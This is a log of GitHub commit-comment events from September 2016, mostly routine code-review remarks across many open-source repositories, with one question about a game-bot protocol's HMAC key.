{"id":"4563798380","type":"CommitCommentEvent","actor":{"login":"thekickass"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19024562,"position":null,"line":null,"path":null,"commit_id":"b16a6f878c2b605ab0c9ec8be849f978f914c062","created_at":"2016-09-14T18:39:10Z","updated_at":"2016-09-14T18:39:10Z","body":"$msg .= hmac_md5($msg, pack('H*', 'EDB9D10AB84C9A2E05E38997C2F64A29'));   \r\nยากทราบ EDB9D10AB84C9A2E05E38997C2F64A29  หาจากไหน ครับ จับจาก Wireshark มัน กี่ byte ครับ"}},"created_at":"2016-09-14T18:39:10Z"}
{"id":"4563799036","type":"CommitCommentEvent","actor":{"login":"jwmq"},"repo":{"name":"NationalSystems/good-bunyan"},"payload":{"comment":{"id":19024565,"position":null,"line":null,"path":null,"commit_id":"9907afd39b33cf51497d2860d4d35d15b06cb70a","created_at":"2016-09-14T18:39:17Z","updated_at":"2016-09-14T18:39:17Z","body":"....*new"}},"created_at":"2016-09-14T18:39:17Z"}
{"id":"4563802597","type":"CommitCommentEvent","actor":{"login":"wbrussell"},"repo":{"name":"wbrussell/ews-managed-api"},"payload":{"comment":{"id":19024584,"position":null,"line":null,"path":null,"commit_id":"436d85f36af90253450c9712b65d17e3bbc884a1","created_at":"2016-09-14T18:39:54Z","updated_at":"2016-09-14T18:39:54Z","body":"I cloned current working master of EWS api and merged in the changes made by the pull request below that never was pulled in to master code.   Last commit on main project was 2015!  Got to move forward with async implementation for portions of the api.  Set target to 4.5 instead of 4.6.\r\n\r\nhttps://github.com/OfficeDev/ews-managed-api/pull/61"}},"created_at":"2016-09-14T18:39:54Z"}
{"id":"4563805048","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19024590,"position":null,"line":null,"path":null,"commit_id":"6586885bcaf062c5f0fd6d6c7652b93c08e7c20c","created_at":"2016-09-14T18:40:22Z","updated_at":"2016-09-14T18:40:22Z","body":"As a consequence, this fixes credit for every gameobject script that called SMART_ACTION_CALL_AREAEXPLOREDOREVENTHAPPENS for a player that was in a group, because in that case the 'me' pointer would be always false, and checks for distance in GroupEventHappens() would fail."}},"created_at":"2016-09-14T18:40:22Z"}
{"id":"4563809155","type":"CommitCommentEvent","actor":{"login":"ebfe"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19024601,"position":null,"line":null,"path":null,"commit_id":"df499fc6e157403bd5493218dd7d81067e1e1418","created_at":"2016-09-14T18:41:03Z","updated_at":"2016-09-14T18:41:03Z","body":"> Cross compiling for qt5 generally does not yet work.\n> You may add nocross=yes, or let the error die out.\n\nYes, this was actually an expected failure. Not added the nocross since\nit never built on arm and apparently it's discouraged to add nocross in\nthis case.\n"}},"created_at":"2016-09-14T18:41:03Z"}
{"id":"4563814410","type":"CommitCommentEvent","actor":{"login":"bpj"},"repo":{"name":"nichtich/Pandoc-Elements"},"payload":{"comment":{"id":19024615,"position":null,"line":null,"path":null,"commit_id":"7ff1e12ce7e21f436493ac5f3920885f20a5ea72","created_at":"2016-09-14T18:41:56Z","updated_at":"2016-09-14T18:41:56Z","body":"Way to go! but why not use subtests to organize things in metadata.t since it uses Test::More 0.96 anyway?"}},"created_at":"2016-09-14T18:41:56Z"}
{"id":"4563816012","type":"CommitCommentEvent","actor":{"login":"riknoll"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":19024624,"position":9,"line":1687,"path":"src/harness/fourslash.ts","commit_id":"4a37fd7bcfa3a10020337dd032fef81dda625bac","created_at":"2016-09-14T18:42:17Z","updated_at":"2016-09-14T18:42:17Z","body":"Actually, I think right now it is possible for `getImplementationsAtPosition` to return an empty array. I'll fix it so that it always returns `undefined` if no implementations are found and update this function."}},"created_at":"2016-09-14T18:42:17Z"}
{"id":"4563816072","type":"CommitCommentEvent","actor":{"login":"johardi"},"repo":{"name":"bdionne/protege-client"},"payload":{"comment":{"id":19024625,"position":5,"line":1171,"path":"src/main/java/org/protege/editor/owl/client/LocalHttpClient.java","commit_id":"d882144b598df405db89f4baf710534c50945b95","created_at":"2016-09-14T18:42:19Z","updated_at":"2016-09-14T18:42:19Z","body":"We made a new push that remove this line of code: https://github.com/protegeproject/protege-client/commit/7ca0fd09b4691cf715ea6320a564e0e36784373e.\r\n\r\nI'd say the UserType is used only to enable/disable the plugins, rather than overlapping the access control policy mechanism that Metaproject has implemented."}},"created_at":"2016-09-14T18:42:19Z"}
{"id":"4563816272","type":"CommitCommentEvent","actor":{"login":"KostyaSha"},"repo":{"name":"jenkinsci/job-dsl-plugin"},"payload":{"comment":{"id":19024627,"position":null,"line":null,"path":null,"commit_id":"7226eb1a0d609eb16174ee9618cd93abd209706d","created_at":"2016-09-14T18:42:20Z","updated_at":"2016-09-14T18:42:20Z","body":"What changed in IDEA?"}},"created_at":"2016-09-14T18:42:20Z"}
{"id":"4563818677","type":"CommitCommentEvent","actor":{"login":"jcalfee"},"repo":{"name":"steemit/steemit.com"},"payload":{"comment":{"id":19024631,"position":null,"line":null,"path":null,"commit_id":"34f6fcd23ea2d56b4cb7c21c8d183654e6801aaf","created_at":"2016-09-14T18:42:47Z","updated_at":"2016-09-14T18:42:47Z","body":"Works on Firefox"}},"created_at":"2016-09-14T18:42:47Z"}
{"id":"4563820948","type":"CommitCommentEvent","actor":{"login":"alisderg"},"repo":{"name":"alisderg/musicSync"},"payload":{"comment":{"id":19024638,"position":null,"line":null,"path":null,"commit_id":"8dba8c19c3380794194a98a01dcdfa54ce5f3e9a","created_at":"2016-09-14T18:43:14Z","updated_at":"2016-09-14T18:43:14Z","body":"leaving a comment after seeing the change."}},"created_at":"2016-09-14T18:43:14Z"}
{"id":"4563823364","type":"CommitCommentEvent","actor":{"login":"RAttab"},"repo":{"name":"RAttab/blah"},"payload":{"comment":{"id":19024643,"position":5,"line":8,"path":"blah/blah.go","commit_id":"6d061560c33041230587b0775927337b470e3a54","created_at":"2016-09-14T18:43:37Z","updated_at":"2016-09-14T18:43:37Z","body":"jhfhjeshgf"}},"created_at":"2016-09-14T18:43:37Z"}
{"id":"4563823570","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19024644,"position":22,"line":368,"path":"youtube_dl/options.py","commit_id":"797c636bcb02d1199015b753d26430eec13c4b2b","created_at":"2016-09-14T18:43:39Z","updated_at":"2016-09-14T18:43:39Z","body":"For options we usually use verb+noun order, e.g. `--list-formats`, `--list-subs`, `--list-thumbnails`, etc. So I guess `--ap-list-mso` fits this rule better."}},"created_at":"2016-09-14T18:43:39Z"}
{"id":"4563823786","type":"CommitCommentEvent","actor":{"login":"tanwanirahul"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19024645,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-14T18:43:41Z","updated_at":"2016-09-14T18:43:41Z","body":"@CodingCat @tqchen - https://groups.google.com/forum/#!topic/xgboost-user/gwt8ozwdZiE"}},"created_at":"2016-09-14T18:43:41Z"}
{"id":"4563824393","type":"CommitCommentEvent","actor":{"login":"RAttab"},"repo":{"name":"RAttab/blah"},"payload":{"comment":{"id":19024648,"position":5,"line":8,"path":"blah/blah.go","commit_id":"6d061560c33041230587b0775927337b470e3a54","created_at":"2016-09-14T18:43:49Z","updated_at":"2016-09-14T18:43:49Z","body":"khkrjydh"}},"created_at":"2016-09-14T18:43:49Z"}
{"id":"4563826551","type":"CommitCommentEvent","actor":{"login":"mitchute"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19024655,"position":5,"line":16,"path":"datasets/ASHRAE_2005_HOF_Materials.idf","commit_id":"d9999000fcad8ad44acc5c068b80c007e550934d","created_at":"2016-09-14T18:44:14Z","updated_at":"2016-09-14T18:44:14Z","body":"@Myoldmopar pulled them out here https://github.com/NREL/EnergyPlus/commit/ec2d46606e9b086a0d36f6fd782d54e5dd5b2a05 No aperant reason, other than to cleanup some mess and update version numbers.\r\n\r\nUp to you. IMO, the version object would be better since we're already geared up to change those as needed."}},"created_at":"2016-09-14T18:44:14Z"}
{"id":"4563826651","type":"CommitCommentEvent","actor":{"login":"alisderg"},"repo":{"name":"alisderg/musicSync"},"payload":{"comment":{"id":19024656,"position":4,"line":26,"path":"login.html","commit_id":"8dba8c19c3380794194a98a01dcdfa54ce5f3e9a","created_at":"2016-09-14T18:44:15Z","updated_at":"2016-09-14T18:44:15Z","body":"plus sign clicked on the red background line"}},"created_at":"2016-09-14T18:44:15Z"}
{"id":"4563828580","type":"CommitCommentEvent","actor":{"login":"joassouza"},"repo":{"name":"jdittrich/ep_autocomp"},"payload":{"comment":{"id":19024664,"position":null,"line":null,"path":null,"commit_id":"85ac4979effcba77d55681e88777c15d36f349ca","created_at":"2016-09-14T18:44:34Z","updated_at":"2016-09-14T18:44:34Z","body":"@JohnMcLear is there any reason that the others settings, e.g. _showOnEmptyWords_ or _ignoreLatinCharacters_,  was not moved to the clientVars as well?"}},"created_at":"2016-09-14T18:44:34Z"}
{"id":"4563828892","type":"CommitCommentEvent","actor":{"login":"alisderg"},"repo":{"name":"alisderg/musicSync"},"payload":{"comment":{"id":19024666,"position":4,"line":26,"path":"login.html","commit_id":"8dba8c19c3380794194a98a01dcdfa54ce5f3e9a","created_at":"2016-09-14T18:44:38Z","updated_at":"2016-09-14T18:44:38Z","body":"sdfsdfsdf"}},"created_at":"2016-09-14T18:44:38Z"}
{"id":"4563830798","type":"CommitCommentEvent","actor":{"login":"psyomn"},"repo":{"name":"RAttab/blah"},"payload":{"comment":{"id":19024679,"position":5,"line":8,"path":"blah/blah.go","commit_id":"6d061560c33041230587b0775927337b470e3a54","created_at":"2016-09-14T18:44:59Z","updated_at":"2016-09-14T18:44:59Z","body":"asdf"}},"created_at":"2016-09-14T18:44:59Z"}
{"id":"4563831513","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19024682,"position":null,"line":null,"path":null,"commit_id":"fe89faaf6b06b3ee5b4de259e8b23b0b2e9fd72b","created_at":"2016-09-14T18:45:10Z","updated_at":"2016-09-14T18:45:10Z","body":"Pls comment in issue thread; there's no way to track commit comments. I'll quote & respond on the issue..."}},"created_at":"2016-09-14T18:45:10Z"}
{"id":"4563831772","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024684,"position":13,"line":45,"path":"package.json","commit_id":"308108ee3b5e3388b615ef46d54be7c08cfe7d44","created_at":"2016-09-14T18:45:13Z","updated_at":"2016-09-14T18:45:13Z","body":"oops"}},"created_at":"2016-09-14T18:45:13Z"}
{"id":"4563831873","type":"CommitCommentEvent","actor":{"login":"psyomn"},"repo":{"name":"RAttab/blah"},"payload":{"comment":{"id":19024685,"position":5,"line":8,"path":"blah/blah.go","commit_id":"6d061560c33041230587b0775927337b470e3a54","created_at":"2016-09-14T18:45:14Z","updated_at":"2016-09-14T18:45:14Z","body":"moar?"}},"created_at":"2016-09-14T18:45:14Z"}
{"id":"4563832128","type":"CommitCommentEvent","actor":{"login":"rektide"},"repo":{"name":"facebook/mcrouter"},"payload":{"comment":{"id":19024686,"position":null,"line":null,"path":null,"commit_id":"01c265d2aafacddd3986e6ca0e6501a0806babbe","created_at":"2016-09-14T18:45:17Z","updated_at":"2016-09-14T18:45:17Z","body":"Super interesting change. What drove this change away from using Thrift as interconnect?"}},"created_at":"2016-09-14T18:45:17Z"}
{"id":"4563833879","type":"CommitCommentEvent","actor":{"login":"RK86"},"repo":{"name":"RK86/DListUpdater"},"payload":{"comment":{"id":19024691,"position":null,"line":null,"path":null,"commit_id":"9deccb3e710082691d6a88a6abb8846bdf69e6ac","created_at":"2016-09-14T18:45:33Z","updated_at":"2016-09-14T18:45:33Z","body":"TEST"}},"created_at":"2016-09-14T18:45:33Z"}
{"id":"4563835525","type":"CommitCommentEvent","actor":{"login":"grant355"},"repo":{"name":"Garrigus/tutorial-forking-pullreq"},"payload":{"comment":{"id":19024695,"position":null,"line":null,"path":null,"commit_id":"3ba891742c7c347f20b662f5b9ebdb9b30463990","created_at":"2016-09-14T18:45:50Z","updated_at":"2016-09-14T18:45:50Z","body":"includes notes on conclusion, basically"}},"created_at":"2016-09-14T18:45:50Z"}
{"id":"4563840603","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19024710,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T18:46:44Z","updated_at":"2016-09-14T18:46:44Z","body":"technically this should be `file://` i think"}},"created_at":"2016-09-14T18:46:44Z"}
{"id":"4563844083","type":"CommitCommentEvent","actor":{"login":"TianZonglin"},"repo":{"name":"TianZonglin/JAVATEST"},"payload":{"comment":{"id":19024722,"position":null,"line":null,"path":null,"commit_id":"01ad9157cf120fc61d472c0fd66a58ce36b4df94","created_at":"2016-09-14T18:47:25Z","updated_at":"2016-09-14T18:47:25Z","body":"换手机好像"}},"created_at":"2016-09-14T18:47:25Z"}
{"id":"4563844669","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19024723,"position":null,"line":null,"path":null,"commit_id":"797c636bcb02d1199015b753d26430eec13c4b2b","created_at":"2016-09-14T18:47:30Z","updated_at":"2016-09-14T18:47:30Z","body":"@yan12125 any thoughts or suggestions on ap interface?"}},"created_at":"2016-09-14T18:47:30Z"}
{"id":"4563844980","type":"CommitCommentEvent","actor":{"login":"akoh17"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19024724,"position":207,"line":58,"path":"ui/app.jsx","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T18:47:35Z","updated_at":"2016-09-14T18:47:35Z","body":"I initially saved the search query in my redux store, but realized I didn't need it throughout my whole app.  Instead i just needed to use it in order to load the list of movies.  But I see the advantage of holding onto the value so we don't read directly from the DOM.\r\n\r\nWould I be able to call setState for this component?  I thought the purpose of redux was so each component was stateless, but was dependent on its props that it received from the redux store."}},"created_at":"2016-09-14T18:47:35Z"}
{"id":"4563846218","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19024727,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-14T18:47:48Z","updated_at":"2016-09-14T18:47:48Z","body":"if possible, keep the dev-related discussion in github..."}},"created_at":"2016-09-14T18:47:48Z"}
{"id":"4563852935","type":"CommitCommentEvent","actor":{"login":"femnad"},"repo":{"name":"femnad/tbd"},"payload":{"comment":{"id":19024749,"position":56,"line":46,"path":"parser.erl","commit_id":"759e1117b046c6f7f6d099165400d429b93064c5","created_at":"2016-09-14T18:49:01Z","updated_at":"2016-09-14T18:49:01Z","body":"If `get_binary` was taking a `frame` record as argument, only on of these 3 calls would be necessary."}},"created_at":"2016-09-14T18:49:01Z"}
{"id":"4563853168","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024750,"position":1,"line":1,"path":"w2d1/.gitignore","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T18:49:04Z","updated_at":"2016-09-14T18:49:04Z","body":"Please add the node_modules folder to gitignore. \r\n\r\nThe node_modules folder usually ends up taking up a lot of space: tens of not hundreds of megabytes and there is little use to backing it up on git, since you can download the packages from npm using `npm install`."}},"created_at":"2016-09-14T18:49:04Z"}
{"id":"4563857689","type":"CommitCommentEvent","actor":{"login":"femnad"},"repo":{"name":"femnad/tbd"},"payload":{"comment":{"id":19024763,"position":29,"line":63,"path":"composer.erl","commit_id":"ed618382095588744d710f8bc230686a4842853a","created_at":"2016-09-14T18:49:49Z","updated_at":"2016-09-14T18:49:49Z","body":"Similarly, these 6 calls to `get_binary` could be avoided if `get_binary` took a single `frame` record as input."}},"created_at":"2016-09-14T18:49:49Z"}
{"id":"4563858569","type":"CommitCommentEvent","actor":{"login":"akirakozov"},"repo":{"name":"akirakozov/cocaine-framework-java"},"payload":{"comment":{"id":19024764,"position":83,"line":135,"path":"cocaine-client/src/main/java/cocaine/service/Service.java","commit_id":"3836a1a83399ef646c895edd2c2296a55d8735f5","created_at":"2016-09-14T18:50:00Z","updated_at":"2016-09-14T18:50:00Z","body":"Тут deadlock будет для сервиса логирования на reconnect, логируй после старта."}},"created_at":"2016-09-14T18:50:00Z"}
{"id":"4563858945","type":"CommitCommentEvent","actor":{"login":"JuanjoSalvador"},"repo":{"name":"JuanjoSalvador/giggity"},"payload":{"comment":{"id":19024768,"position":null,"line":null,"path":null,"commit_id":"2a490483a8e42e31474a781e9fff85cc65c8a4ae","created_at":"2016-09-14T18:50:05Z","updated_at":"2016-09-14T18:50:05Z","body":"Need revision"}},"created_at":"2016-09-14T18:50:05Z"}
{"id":"4563859319","type":"CommitCommentEvent","actor":{"login":"johardi"},"repo":{"name":"bdionne/protege-client"},"payload":{"comment":{"id":19024769,"position":36,"line":36,"path":"src/main/java/org/protege/editor/owl/client/TabViewableChecker.java","commit_id":"d882144b598df405db89f4baf710534c50945b95","created_at":"2016-09-14T18:50:11Z","updated_at":"2016-09-14T18:50:11Z","body":"You can simplify the code into this one line: `return client.getActiveRoles().contains(ConfigurationUtils.getProjectManagerRole());`"}},"created_at":"2016-09-14T18:50:11Z"}
{"id":"4563859577","type":"CommitCommentEvent","actor":{"login":"bpj"},"repo":{"name":"nichtich/Pandoc-Elements"},"payload":{"comment":{"id":19024770,"position":null,"line":null,"path":null,"commit_id":"971dad2fd932ef1f5f7268359bdd703339b43184","created_at":"2016-09-14T18:50:14Z","updated_at":"2016-09-14T18:50:14Z","body":"Nice!"}},"created_at":"2016-09-14T18:50:14Z"}
{"id":"4563860946","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19024771,"position":null,"line":null,"path":null,"commit_id":"0d186c68e43f4cfbc2e3601b2a4f39f61fa540c3","created_at":"2016-09-14T18:50:28Z","updated_at":"2016-09-14T18:50:28Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-wordpress](https://slashzerop-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-14T18:50:28Z"}
{"id":"4563862222","type":"CommitCommentEvent","actor":{"login":"nniese"},"repo":{"name":"nniese/compiler-Prodject"},"payload":{"comment":{"id":19024775,"position":null,"line":null,"path":null,"commit_id":"e20b48d8e0742b84ea037ce642de9a16660e0e74","created_at":"2016-09-14T18:50:42Z","updated_at":"2016-09-14T18:50:42Z","body":"Added 0 exception along with other error messages "}},"created_at":"2016-09-14T18:50:42Z"}
{"id":"4563862588","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19024777,"position":22,"line":368,"path":"youtube_dl/options.py","commit_id":"797c636bcb02d1199015b753d26430eec13c4b2b","created_at":"2016-09-14T18:50:45Z","updated_at":"2016-09-14T18:50:45Z","body":"than returning to an option similar to the previous attempt(`--list-ap-msos`) would be more closer to `--list-formats`, `--list-subs`, `--list-thumbnails` than `--ap-list-mso`."}},"created_at":"2016-09-14T18:50:45Z"}
{"id":"4563866895","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024787,"position":4,"line":4,"path":"w2d1/downloadImg.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T18:51:31Z","updated_at":"2016-09-14T18:51:31Z","body":"👍 for using process.env.TOKEN instead of hardcoding your secret token."}},"created_at":"2016-09-14T18:51:31Z"}
{"id":"4563868164","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024790,"position":8,"line":8,"path":"w2d1/downloadImg.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T18:51:43Z","updated_at":"2016-09-14T18:51:43Z","body":"fix indentation."}},"created_at":"2016-09-14T18:51:43Z"}
{"id":"4563868840","type":"CommitCommentEvent","actor":{"login":"kswenson"},"repo":{"name":"concord-consortium/cloud-file-manager"},"payload":{"comment":{"id":19024793,"position":null,"line":null,"path":null,"commit_id":"cec1c10a7b3be6b9d1c9ad55861eb2401933e4f5","created_at":"2016-09-14T18:51:50Z","updated_at":"2016-09-14T18:51:50Z","body":"I think this still requires a bit more thought. In the case where the initial `launchWithLara` params contain a `url` and a `source`, I believe the resulting `launchWithLara` params should just contain the `url` because the `source` is no longer required once the copy has been made. Separately, the fallback to the `providerParams` was intended to handle the case where an old-style url with `recordid` and `runKey` is converted to `launchWithLara` params. Maybe we don't need to handle that case once the migration is complete. In any case, we should make sure that all the scenarios are handled correctly in the url params."}},"created_at":"2016-09-14T18:51:50Z"}
{"id":"4563869712","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19024799,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T18:51:59Z","updated_at":"2016-09-14T18:51:59Z","body":"@Iamblichos @ilteroi I'll be available for the next few hours (baby sleeps), just let me know when you all free up.\r\n"}},"created_at":"2016-09-14T18:51:59Z"}
{"id":"4563869758","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19024801,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-14T18:51:59Z","updated_at":"2016-09-14T18:51:59Z","body":"> 1. The XGBoostEstimator and the XGBoostModel does not use/implement the params interface. All the ml models in Spark, use the Params trait / interface for the hyper parameters. Due to this, we cannot use the current implementation with CrossValidator in Spark. Also, any new functionality in Spark relying on the assumptions on Params/ ParamsMap could not be seamlessly integrated with this implementation. For e.g - If someone adds spearmint package with Spark, it would likely work on Params interface only.\r\n\r\nas mentioned in PR, this will be included in another PR\r\n\r\n> 2. Dependency on Spark 2.0 - Most of the current product deployments would be on Spark 1.x. It may take more than a year before these apps are migrated to 2.0 especially because the apps need to also upgrade to Scala 2.11. I feel we should support the Spark 1.6 as well side by side and provide the support for DataFrame and Pipeline APIs.\r\n\r\nplease feel free to maintain spark 1.6 version, since Spark 2.0 has broken the backward compatibility to Spark 1.x, we have to choose only one of them \r\n\r\n> 3. Backward incompatible changes - XGBoost.train has been removed and is substituted by trainWithRDD and trainWithDataFrame. We should rather keep the train method as is and add the overloaded method for the DataSet.\r\n\r\nif you once tried that you will find scala does not allow to overload methods with default parameters"}},"created_at":"2016-09-14T18:51:59Z"}
{"id":"4563869905","type":"CommitCommentEvent","actor":{"login":"frankiefu"},"repo":{"name":"PolymerElements/app-layout"},"payload":{"comment":{"id":19024802,"position":4,"line":132,"path":"app-drawer-layout/app-drawer-layout.html","commit_id":"cc380a0f41cb5ec077e32459928687891ec64947","created_at":"2016-09-14T18:52:00Z","updated_at":"2016-09-14T18:52:00Z","body":"https://github.com/PolymerElements/app-layout/commit/cc380a0f41cb5ec077e32459928687891ec64947#diff-b76a48abda182957a3130a80696afb62R122: Should use the new `@apply` syntax."}},"created_at":"2016-09-14T18:52:00Z"}
{"id":"4563870145","type":"CommitCommentEvent","actor":{"login":"stoffeastrom"},"repo":{"name":"consafelogistics/foo"},"payload":{"comment":{"id":19024803,"position":4,"line":13,"path":"ConsoleApplication1/ConsoleApplication1/Program.cs","commit_id":"cd056f6ef2cfe975cba03be95961d62298858b3e","created_at":"2016-09-14T18:52:04Z","updated_at":"2016-09-14T18:52:04Z","body":":shipit: "}},"created_at":"2016-09-14T18:52:04Z"}
{"id":"4563874229","type":"CommitCommentEvent","actor":{"login":"joekiller"},"repo":{"name":"healthonnet/hon-lucene-synonyms"},"payload":{"comment":{"id":19024814,"position":null,"line":null,"path":null,"commit_id":"c87fb8ced0abc9e19381a4843c964cf8473e8912","created_at":"2016-09-14T18:52:48Z","updated_at":"2016-09-14T18:52:48Z","body":"lol. the community owns it now!"}},"created_at":"2016-09-14T18:52:48Z"}
{"id":"4563879394","type":"CommitCommentEvent","actor":{"login":"bpj"},"repo":{"name":"nichtich/Pandoc-Elements"},"payload":{"comment":{"id":19024827,"position":null,"line":null,"path":null,"commit_id":"b16e18ad53f9466a9ca2e93b04853552222299ae","created_at":"2016-09-14T18:53:45Z","updated_at":"2016-09-14T18:53:45Z","body":"I can remove a couple of functions from my utilities module!"}},"created_at":"2016-09-14T18:53:45Z"}
{"id":"4563879731","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024828,"position":5,"line":5,"path":"w2d1/getContributorsExport.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T18:53:48Z","updated_at":"2016-09-14T18:53:48Z","body":"Repo and owner are constants too. They will not change during the execution of the program, right?"}},"created_at":"2016-09-14T18:53:48Z"}
{"id":"4563882484","type":"CommitCommentEvent","actor":{"login":"belousovnikolai"},"repo":{"name":"belousovnikolai/jsDemo"},"payload":{"comment":{"id":19024831,"position":null,"line":null,"path":null,"commit_id":"cf1fe6ab337f8edda43cde1f140849df31d53b25","created_at":"2016-09-14T18:54:20Z","updated_at":"2016-09-14T18:54:20Z","body":":octocat: "}},"created_at":"2016-09-14T18:54:20Z"}
{"id":"4563884133","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024834,"position":18,"line":18,"path":"w2d1/getContributorsExport.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T18:54:37Z","updated_at":"2016-09-14T18:54:37Z","body":"inentation"}},"created_at":"2016-09-14T18:54:37Z"}
{"id":"4563884834","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024836,"position":20,"line":20,"path":"w2d1/getContributorsExport.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T18:54:44Z","updated_at":"2016-09-14T18:54:44Z","body":"indentation"}},"created_at":"2016-09-14T18:54:44Z"}
{"id":"4563885911","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19024840,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-14T18:54:56Z","updated_at":"2016-09-14T18:54:56Z","body":"I suggest that you can merge your params related part with the master "}},"created_at":"2016-09-14T18:54:56Z"}
{"id":"4563887898","type":"CommitCommentEvent","actor":{"login":"auser"},"repo":{"name":"slycoder/react-native-firestack"},"payload":{"comment":{"id":19024847,"position":null,"line":null,"path":null,"commit_id":"b098a60a18697c8d7f8440324aa2d01b2bd17f22","created_at":"2016-09-14T18:55:20Z","updated_at":"2016-09-14T18:55:20Z","body":"Hey guy,\r\n\r\nI pushed some updates on the `feature/messaging` branch (https://github.com/fullstackreact/react-native-firestack/tree/feature/messaging) that fixes the bug we were seeing. Not complete, but if you want to contribute/work on it, that'd be awesome. \r\n\r\nCheers!"}},"created_at":"2016-09-14T18:55:20Z"}
{"id":"4563891223","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024856,"position":33,"line":33,"path":"w2d1/getContributorsExport.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T18:55:56Z","updated_at":"2016-09-14T18:55:56Z","body":"fix indentation."}},"created_at":"2016-09-14T18:55:56Z"}
{"id":"4563900783","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19024883,"position":22,"line":368,"path":"youtube_dl/options.py","commit_id":"797c636bcb02d1199015b753d26430eec13c4b2b","created_at":"2016-09-14T18:57:43Z","updated_at":"2016-09-14T18:57:43Z","body":"I'm trying to make them all prefixed with `--ap` for better visual grouping and autocomplete experiences. But as already mentioned both `--ap-list-...` and `--list-ap-...` may be added as aliases."}},"created_at":"2016-09-14T18:57:43Z"}
{"id":"4563902416","type":"CommitCommentEvent","actor":{"login":"KostyaSha"},"repo":{"name":"jenkinsci/cloud-stats-plugin"},"payload":{"comment":{"id":19024886,"position":18,"line":43,"path":"src/main/java/org/jenkinsci/plugins/cloudstats/TrackedItem.java","commit_id":"cfb26a1b5ebaa8243451ca2862c78860b00d1a4d","created_at":"2016-09-14T18:58:02Z","updated_at":"2016-09-14T18:58:02Z","body":"@olivergondza very bad naming! Classes may already have `getId()` for their needs. Please name in any other way."}},"created_at":"2016-09-14T18:58:02Z"}
{"id":"4563904788","type":"CommitCommentEvent","actor":{"login":"che"},"repo":{"name":"minsk-hackerspace/hsWEB"},"payload":{"comment":{"id":19024887,"position":22,"line":19,"path":"README.md","commit_id":"bbdc200a85c33d9fa965158958ba032b347a2931","created_at":"2016-09-14T18:58:29Z","updated_at":"2016-09-14T18:58:29Z","body":"Нет, потомучто должно выполняться без костылей, а в данном случае путь - это костыль.\r\n"}},"created_at":"2016-09-14T18:58:29Z"}
